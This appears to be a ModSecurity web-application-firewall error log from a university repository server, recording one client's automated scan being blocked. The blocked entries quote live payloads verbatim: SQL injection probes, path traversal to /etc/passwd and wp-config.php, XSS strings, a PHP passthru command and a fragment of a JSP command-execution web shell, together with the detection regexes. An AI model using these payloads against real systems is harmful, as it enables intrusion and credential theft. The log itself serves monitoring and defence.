[Tue Aug 29 11:47:15.433241 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjCbE4AAAAB"]
[Tue Aug 29 11:47:16.413003 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAhzvq8AAAAx"]
[Tue Aug 29 11:47:17.704794 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VcCo-f0AAAfECDMAAAAO"]
[Tue Aug 29 11:47:18.518506 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAhui8EAAAAr"]
[Tue Aug 29 11:47:19.540244 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAi@TDQAAAAM"]
[Tue Aug 29 11:47:19.561126 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAi@TDUAAAAM"]
[Tue Aug 29 11:47:22.418698 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT3-0AAAAD"]
[Tue Aug 29 11:47:23.408285 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAi2yH0AAAAN"]
[Tue Aug 29 11:47:25.371331 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAjCbGAAAAAB"]
[Tue Aug 29 11:47:25.461306 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjL8UAAAAAR"]
[Tue Aug 29 11:47:26.375010 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjtc1IAAAAX"]
[Tue Aug 29 11:47:28.376335 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14YMCo-f0AAAhui9UAAAAr"]
[Tue Aug 29 11:47:31.482449 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAfECEgAAAAO"]
[Tue Aug 29 11:47:32.938851 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9EEAAAAA"]
[Tue Aug 29 11:47:34.578316 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAhT4BUAAAAD"]
[Tue Aug 29 11:47:37.368683 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAjdQPIAAAAZ"]
[Tue Aug 29 11:47:37.515340 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAkNPlsAAAAI"]
[Tue Aug 29 11:47:39.431353 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjZRb0AAAAS"]
[Tue Aug 29 11:47:40.419205 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb8AAAAS"]
[Tue Aug 29 11:47:40.433895 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb8AAAAS"]
[Tue Aug 29 11:47:41.506523 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GcAAAAA"]
[Tue Aug 29 11:47:41.514895 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GcAAAAA"]
[Tue Aug 29 11:47:42.385738 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjav34AAAAV"]
[Tue Aug 29 11:47:42.488028 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjZRcgAAAAS"]
[Tue Aug 29 11:47:43.620273 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjFofAAAAAF"]
[Tue Aug 29 11:47:44.370990 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAhui@wAAAAr"]
[Tue Aug 29 11:47:44.390595 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8V0AAAAR"]
[Tue Aug 29 11:47:45.536567 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjtc4EAAAAX"]
[Tue Aug 29 11:47:47.209019 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkdu2wAAAAO"]
[Tue Aug 29 11:47:48.440769 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjrbJ0AAAAP"]
[Tue Aug 29 11:47:49.378651 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAi2yK0AAAAN"]
[Tue Aug 29 11:47:49.492002 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkdu3oAAAAO"]
[Tue Aug 29 11:47:49.586825 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjL8W0AAAAR"]
[Tue Aug 29 11:47:50.394518 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjL8W8AAAAR"]
[Tue Aug 29 11:47:50.415116 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAjCbLgAAAAB"]
